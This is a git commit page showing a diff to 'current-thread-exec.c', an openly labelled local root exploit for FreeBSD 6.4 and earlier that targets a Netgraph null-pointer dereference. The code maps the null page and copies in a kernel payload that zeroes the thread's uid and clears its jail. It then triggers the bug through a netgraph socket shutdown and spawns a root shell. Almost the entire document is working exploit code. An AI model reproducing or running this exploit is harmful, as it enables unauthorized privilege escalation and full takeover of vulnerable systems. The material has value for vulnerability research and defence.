authorJason A. Donenfeld <Jason@zx2c4.com>2011-02-26 21:57:37 -0500
committerJason A. Donenfeld <Jason@zx2c4.com>2011-02-26 22:03:28 -0500
commit60cecd4a4ec67109f421ffd7ebb00589e30f0cf8 (patch)
treede6f2b876e1f3b601f3e698a7d855c60a56443b9
parentSince the template search is a little buggy and sometimes causes panic, just do a more traditional UID=0 for the current thread and then execl sh into the process. (diff)
Clean up headers. Make l33t.
-rw-r--r--current-thread-exec.c73
1 files changed, 41 insertions, 32 deletions
diff --git a/current-thread-exec.c b/current-thread-exec.c
index 9f2f7b2..1bf6dbd 100644
--- a/current-thread-exec.c
+++ b/current-thread-exec.c
@@ -1,83 +1,92 @@
#define _KERNEL
-#include <sys/param.h>
-#include <sys/mman.h>
+#include <sys/types.h>
#include <sys/time.h>
-#include <sys/stat.h>
+#include <sys/param.h>
#include <sys/proc.h>
#include <sys/ucred.h>
-#include <sys/types.h>
+#include <sys/mman.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
-#include <unistd.h>
-#include <stdlib.h>
#include <stdio.h>
-#include <errno.h>
+#include <unistd.h>
#define PAGES 1
-typedef unsigned long ulong;
-typedef unsigned char uchar;
-
-int
-x(void)
+volatile int got_root = 0;
+int root(void)
{
struct thread *thread;
-
asm(
"movl %%fs:0, %0"
: "=r"(thread)
);
-
thread->td_critnest = 0;
thread->td_proc->p_ucred->cr_uid = 0;
thread->td_proc->p_ucred->cr_prison = NULL;
-
+ got_root = 1;
return 0;
-
}
-int
-main(int argc, char * argv[])
+int main(int argc, char *argv[])
{
- uchar * c;
- uchar * d;
- void * v;
+ unsigned char *c;
+ unsigned char *d;
+ void *v;
int s;
+ fprintf(stderr, "~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n");
+ fprintf(stderr, "~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n");
+ fprintf(stderr, "~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n");
+
+ fprintf(stderr, "[+] mmapping null page\n");
v = mmap(
NULL,
- (PAGES * PAGE_SIZE),
+ PAGES * PAGE_SIZE,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_ANON | MAP_FIXED,
-1,
0);
- if(v == MAP_FAILED) {
- perror("mmap");
- return 0;
+ if (v == MAP_FAILED) {
+ perror("[-] mmap failed");
+ return -1;
}
+ fprintf(stderr, "[+] copying pwnage into null page\n");
c = v;
- d = (uchar * )x;
- while(1) {
+ d = (unsigned char*)root;
+ while (1) {
*c = *d;
- if(*d == 0xc3)
+ if (*d == 0xc3)
break;
-
d++;
c++;
}
*c++ = 0xc3;
+ fprintf(stderr, "[+] opening netgraph socket\n");
s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
- if(s < 0) {
- perror("socket");
- return 1;
+ if (s < 0) {
+ perror("[-] failed to open netgraph socket");
+ return -1;
}
+ fprintf(stderr, "[+] triggering null dereference\n");
shutdown(s, SHUT_RDWR);
+ if (!got_root) {
+ fprintf(stderr, "[-] failed to trigger pwnage\n");
+ return -1;
+ }
+
+ fprintf(stderr, "[+] elevating permissions\n");
setuid(0);
setgid(0);
+ if (getuid() != 0) {
+ fprintf(stderr, "[-] failed to get root\n");
+ return -1;
+ }
+
+ fprintf(stderr, "[+] got root!\n");
execl("/bin/sh", "sh", NULL);
return 0;